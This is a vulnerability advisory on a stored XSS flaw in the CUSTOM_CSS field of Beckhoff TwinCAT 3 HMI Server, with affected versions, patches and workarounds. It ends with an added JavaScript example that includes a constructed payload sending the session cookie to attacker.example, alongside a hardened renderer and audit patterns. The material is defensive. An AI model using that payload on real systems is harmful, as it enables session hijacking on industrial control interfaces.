Beckhoff: XSS Vulnerability in TwinCAT 3 HMI Server
Monitor | 5.5 | VDE-2025-106 | Jan 26, 2026
Attack Vector: Network
Auth Required: High
Complexity: Low
User Interaction: None needed
Summary
A stored cross-site scripting (XSS) vulnerability exists in the TwinCAT 3 HMI Server configuration page. An administrator can store arbitrary content in the CUSTOM_CSS field; the server keeps that value on the device and renders it into the login and error pages without restricting it to style rules. Script placed in the field therefore runs in the browser of every user who opens the login page or hits an error page. The vulnerability affects the TwinCAT.HMI.Server package and the TF2000-HMI-Server software on multiple platforms. Beckhoff has released fixes for the TwinCAT/BSD and npm (tcpkg) packages, but no patch is currently available for the Linux ARM64 and AMD64 variants.
What this means
What could happen
An administrator with access to the TwinCAT 3 HMI Server configuration page could store script in the CUSTOM_CSS field that runs in the browser of every other user who opens the login or error page, allowing credential theft, session hijacking or disruption of HMI operation. The victim only has to load one of those pages; no further interaction is needed. Because administrator credentials are required, the immediate risk is limited, but a payload planted this way survives reboots and updates of the page content until the field is cleaned, so it gives an attacker who holds (or has compromised) an admin account a persistence mechanism on the control system's HMI.
Who's at risk
Manufacturing facilities using Beckhoff TwinCAT 3 HMI Server for process visualization and control system interfaces. Affects operators running the optional HMI server package on TwinCAT/BSD systems and on Beckhoff RT Linux real-time controllers (both ARM64 and AMD64 architectures). Any installation that exposes the server configuration page to administrators is affected, whether or not the CUSTOM_CSS field is currently used for HMI customization.
How it could be exploited
An attacker holding admin credentials opens the HMI server configuration page and places HTML/JavaScript, rather than style rules, into the CUSTOM_CSS field. The server stores the value on the device and embeds it as-is in the login and error pages, so the script runs automatically in the browser of every user who logs in or sees an error page, allowing credential theft or session hijacking. The injected content is delivered by the legitimate HMI server itself, so it is not blocked by same-origin restrictions and is not visible to the victim unless the page source is inspected.
Prerequisites
- Administrator credentials for TwinCAT 3 HMI Server
- Access to the HMI server configuration page (admin-only UI)
- A victim must load the login page or an error page for the payload to run (this happens in normal use; no additional interaction is required)
Tags: remotely exploitable; requires administrator credentials; low complexity; affects visualization and HMI systems
Exploitability
Low exploit probability (EPSS 0.1%)
Affected products (4)
2 with fix, 2 pending

Product | Affected Versions | Fix Status
TwinCAT.HMI.Server tcpkg package | < 14.4.267 | 14.4.267
TF2000-HMI-Server OS software package for TwinCAT/BSD | < 14.4.267 | 14.4.267
tf2000-hmi-server OS software package for Beckhoff RT Linux(R) on ARM64 | < 14.4.267 | No fix yet
tf2000-hmi-server for Beckhoff RT Linux(R) on AMD64 | < 14.4.267 | No fix yet
Remediation & Mitigation
Do now
WORKAROUND: For Beckhoff RT Linux ARM64 and AMD64 systems, where no fix is available yet, contact Beckhoff support to confirm the patch timeline. In the interim, restrict access to the HMI server configuration page to trusted personnel only (limit which accounts hold the administrator role and which networks can reach the configuration interface), and treat any change to CUSTOM_CSS as a security-relevant event.
Schedule — requires maintenance window
Patching may require device reboot — plan for process interruption
HOTFIX: Update the TwinCAT.HMI.Server tcpkg package to version 14.4.267 or later
HOTFIX: Update the TF2000-HMI-Server OS software package for TwinCAT/BSD to version 14.4.267 or later
HARDENING: Audit the stored CUSTOM_CSS value on every HMI server for anything that is not plain style rules (HTML tags, script, event handlers, external URLs), and review admin access logs for unauthorized configuration changes. Re-check after patching, since updating the package does not remove a payload that is already stored.
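The following is an added example, not Beckhoff's code and not taken from this advisory. It models the bug class described under "How it could be exploited" and gives a concrete form to the HARDENING audit step above. It rests on one hypothetical assumption: that the server inlines the stored CUSTOM_CSS value verbatim into a <style> element of the login and error pages. The function names, the constructed payload, the hardened renderer and the indicator list are all assumptions of this example; the real fix in 14.4.267 may work differently.

```javascript
// Added example (not Beckhoff's code). Assumes, hypothetically, that the HMI
// server inlines the stored CUSTOM_CSS value verbatim into a <style> element
// of the login and error pages. Names, payload and indicators are constructed.

function wrapLoginPage(styleBody) {
  // Minimal stand-in for the login page; the form is illustrative only.
  return '<!doctype html><html><head><style>' + styleBody + '</style></head>' +
         '<body><form method="post" action="/login">' +
         '<input name="user"><input name="pass" type="password">' +
         '</form></body></html>';
}

// Vulnerable rendering: whatever the administrator stored is emitted as-is.
function renderLoginPageVulnerable(customCss) {
  return wrapLoginPage(customCss);
}

// Constructed payload: starts as valid CSS, closes the <style> element,
// injects a script that leaks the session cookie, then re-opens <style> so
// the rest of the page still parses and nothing looks broken to the victim.
const CONSTRUCTED_PAYLOAD =
  'body{color:#333}</style>' +
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>' +
  '<style>';

// The HTML tokenizer ends a <style> element at the first "</style" it meets,
// whatever the CSS grammar says, so that is the one sequence a value in a
// style context must never contain. Deliberately conservative: case-insensitive
// and not requiring the closing ">".
function escapesStyleContext(value) {
  return /<\/style/i.test(value);
}

// Hardened rendering: reject break-outs outright and, as defence in depth,
// rewrite every "</" as "<\/". Inside CSS "\/" is just an escaped "/", but the
// HTML tokenizer no longer sees the start of an end tag.
function renderLoginPageHardened(customCss) {
  if (escapesStyleContext(customCss)) {
    throw new Error('CUSTOM_CSS rejected: value would terminate the <style> element');
  }
  return wrapLoginPage(customCss.replace(/<\//g, '<\\/'));
}

// Audit helper for the HARDENING step: classify a stored CUSTOM_CSS value.
// Returns the labels of every indicator that matched (empty = nothing found).
// Local url(/fonts/x.woff) references are not flagged; protocol-relative or
// absolute external URLs are, because CSS can exfiltrate data via @import/url().
const CUSTOM_CSS_INDICATORS = [
  ['style-breakout',    /<\/style/i],
  ['html-tag',          /<\s*(script|iframe|img|svg|object|embed|link|meta)\b/i],
  ['event-handler',     /\bon[a-z]+\s*=/i],
  ['javascript-uri',    /javascript\s*:/i],
  ['css-expression',    /expression\s*\(/i],
  ['external-resource', /(@import|url\s*\()\s*["']?\s*(https?:)?\/\//i],
];

function auditCustomCss(value) {
  const findings = [];
  for (const [label, pattern] of CUSTOM_CSS_INDICATORS) {
    if (pattern.test(value)) findings.push(label);
  }
  return findings;
}

// Stand-alone run: show the break-out, the rejection and the audit verdicts.
console.log('vulnerable page contains <script>:',
            renderLoginPageVulnerable(CONSTRUCTED_PAYLOAD).includes('<script>'));
try {
  renderLoginPageHardened(CONSTRUCTED_PAYLOAD);
} catch (e) {
  console.log('hardened renderer:', e.message);
}
console.log('audit(payload)     =', auditCustomCss(CONSTRUCTED_PAYLOAD));
console.log('audit(benign)      =', auditCustomCss('body{background:#eee}'));
console.log('audit(remote font) =', auditCustomCss('@import url("https://x.example/a.css");'));
```

To use the audit part in practice, export the stored CUSTOM_CSS value from each HMI server's configuration and feed it to auditCustomCss; any "style-breakout", "html-tag", "event-handler" or "javascript-uri" finding should be treated as an incident, while "external-resource" needs a human to confirm the URL is an approved font or stylesheet host. The hardened renderer shows the rejection-plus-escaping pattern; a Content Security Policy that forbids inline script would add a second, independent layer.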
CVEs (1)
API:
/api/v1/advisories/93ae594c-d332-4964-bb51-5d5b9f46e962